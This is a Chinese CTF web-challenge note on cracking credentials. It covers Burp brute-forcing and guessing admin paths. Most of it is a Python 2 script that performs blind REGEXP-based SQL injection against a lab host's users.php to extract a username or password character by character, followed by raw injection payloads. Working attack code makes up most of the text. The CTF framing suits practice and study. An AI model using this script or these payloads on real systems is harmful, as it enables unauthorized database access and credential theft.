CTF web题总结--爆破用户名密码

1、burp爆破用户名密码
2、id,userid,useId多试几次
3、爆破后台目录,index.php,users.php,login.php,flag.php
4、脚本:

# -*- coding:utf-8 -*-
import httplib
import re
import urllib

class Attacker:

    def __init__(self, mode, url):

        self.url = url
        self.domin = self.get_domin()
        self.mode = mode
        str1 = []
        for i in range(26):
            str1.append(chr(ord('a') + i))
        for i in range(26):
            str1.append(chr(ord('A') + i))
        for i in range(10):
            str1.append(chr(ord('0') + i))
        self.str_box = str1

    def get_domin(self):
        url = self.url
        url_a = url.split('://')
        if re.match('^http',url_a[0]):

            url = url_a[1]
        else:
            url = url_a[0]
        url_a = url.split('/')
        domin = url_a[0]
        return domin

    def crack(self):
        conn = httplib.HTTPConnection(self.domin)
        if self.mode == 1:
            aim = 'username'
        if self.mode == 2:
            aim = 'password'
        url = self.url
        attack_url1 = urllib.quote('\' or ' + aim + ' regexp \'')
        attack_url2 = urllib.quote('\' #')
        str_box = self.str_box

        try:
            string = '^'
            while True:
                for str_end in str_box:
                    url_to_attack = url + attack_url1 + string + str_end + attack_url2 
                    #print url_to_attack
                    conn.request(method="GET", url=url_to_attack)
                    response = conn.getresponse()
                    res = response.read()
                    if res.find('useless') > 0:
                        string = string + str_end
                        str_end = -1
                        print string[1:] #如果想看到破进程,取消此段注释
                        break
                if str_end != -1 and str_end == '9': 
                    break


            self.name = string
            print self.name[1:]

        except:
            print "Something Wrong"
            print url

def main():
    attack_url = 'http://10.200.91.28/zebCTF/users.php?userId=2'
    attacker = Attacker(2, attack_url) #1为用户名注入,2为密码注入
    attacker.crack()

if __name__ == '__main__':
    main()

正则注入

userId=2%27%20or username REGEXP '^A' %23
userId=2%27%20or username REGEXP '^a' %23
userId=2%27%20or username REGEXP '^Z' %23

你可能感兴趣的:(Web)